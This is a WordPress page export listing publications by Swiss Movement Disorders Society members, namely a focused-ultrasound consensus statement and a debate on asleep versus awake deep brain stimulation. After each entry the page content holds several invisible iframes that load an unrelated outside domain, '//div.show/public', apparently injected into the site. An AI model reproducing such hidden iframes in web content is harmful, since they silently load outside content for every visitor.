{"id":966,"date":"2018-11-21T15:52:54","date_gmt":"2018-11-21T13:52:54","guid":{"rendered":"https:\/\/www.movementdisorders.ch\/index\/?page_id=966"},"modified":"2025-05-25T15:40:48","modified_gmt":"2025-05-25T13:40:48","slug":"publications","status":"publish","type":"page","link":"https:\/\/www.movementdisorders.ch\/index\/publications\/","title":{"rendered":"Publications &#038; Reviews of  SMDS members"},"content":{"rendered":"<div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-1 nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"--awb-background-position:left top;--awb-border-radius-top-left:0px;--awb-border-radius-top-right:0px;--awb-border-radius-bottom-right:0px;--awb-border-radius-bottom-left:0px;--awb-margin-top:3%;--awb-margin-bottom:0px;--awb-flex-wrap:wrap;\" ><div class=\"fusion-builder-row fusion-row\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-0 fusion_builder_column_1_1 1_1 fusion-one-full fusion-column-first fusion-column-last\" style=\"--awb-bg-size:cover;--awb-margin-bottom:0px;\"><div class=\"fusion-column-wrapper fusion-flex-column-wrapper-legacy\"><div class=\"fusion-title title fusion-title-1 fusion-sep-none fusion-title-center fusion-title-text fusion-title-size-two\" style=\"--awb-margin-bottom:10px;\"><h2 class=\"fusion-title-heading title-heading-center fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:47;line-height:1.2;\"><h2 style=\"text-align: left;\">Publications &amp; Reviews of SMDS members<\/h2><\/h2><\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-clearfix\" style=\"float:left;margin-top:10px;margin-bottom:30px;width:100%;max-width:70%;\"><div class=\"fusion-separator-border sep-single\" style=\"--awb-height:20px;--awb-amount:20px;--awb-sep-color:#091d36;border-color:#091d36;border-top-width:1px;\"><\/div><\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-clearfix\"><\/div><\/div><\/div><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-1 fusion_builder_column_1_1 1_1 fusion-one-full fusion-column-first fusion-column-last\" style=\"--awb-bg-size:cover;\"><div class=\"fusion-column-wrapper fusion-flex-column-wrapper-legacy\"><div class=\"fusion-text fusion-text-1\"><h3>Consensus Statement on High-Intensity Focused Ultrasound for Functional Neurosurgery in Switzerland<\/h3>\n<p>Frontiers in Neurology 2021<\/p>\n<h6><em>Lennart H. Stieglitz, Markus F. Oertel, Ettore A. Accolla, Julien Bally, Roland Bauer, Christian R. Baumann, David Benninger, Stephan Bohlhalter, Fabian B\u00fcchele, Stefan H\u00e4gele-Link, Georg K\u00e4gi, Paul Krack, Marie T. Kr\u00fcger, Sujitha Mahendran, J. Carsten M\u00f6ller, Veit Mylius, Tobias Piroth, Beat Werner and Alain Kaelin-Lang<\/em><\/h6>\n<p><a href=\"https:\/\/www.frontiersin.org\/journals\/neurology\/articles\/10.3389\/fneur.2021.722762\/full\">Link<\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-clearfix\" style=\"float:left;margin-top:10px;margin-bottom:30px;width:100%;max-width:70%;\"><div class=\"fusion-separator-border sep-single\" style=\"--awb-height:20px;--awb-amount:20px;--awb-sep-color:#091d36;border-color:#091d36;border-top-width:1px;\"><\/div><\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-text fusion-text-2\"><h3><\/h3>\n<h3 class=\"article-page__title\">Should asleep deep brain stimulation in Parkinson\u2019s disease be preferred over the awake approach?<\/h3>\n<p>Swiss Medical Weekly 2024<\/p>\n<p><a href=\"https:\/\/smw.ch\/index.php\/smw\/article\/view\/3823\/6000\">Pros<\/a> \/\u00a0<a href=\"https:\/\/smw.ch\/index.php\/smw\/article\/view\/3855\/6001\">Cons<\/a> \/\u00a0<a href=\"https:\/\/smw.ch\/index.php\/smw\/article\/view\/3856\/5997\">Commentary<\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<\/div><div class=\"fusion-clearfix\"><\/div><\/div><\/div><\/div><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"100-width.php","meta":{"footnotes":""},"class_list":["post-966","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/pages\/966","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/comments?post=966"}],"version-history":[{"count":9,"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/pages\/966\/revisions"}],"predecessor-version":[{"id":2755,"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/pages\/966\/revisions\/2755"}],"wp:attachment":[{"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/media?parent=966"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}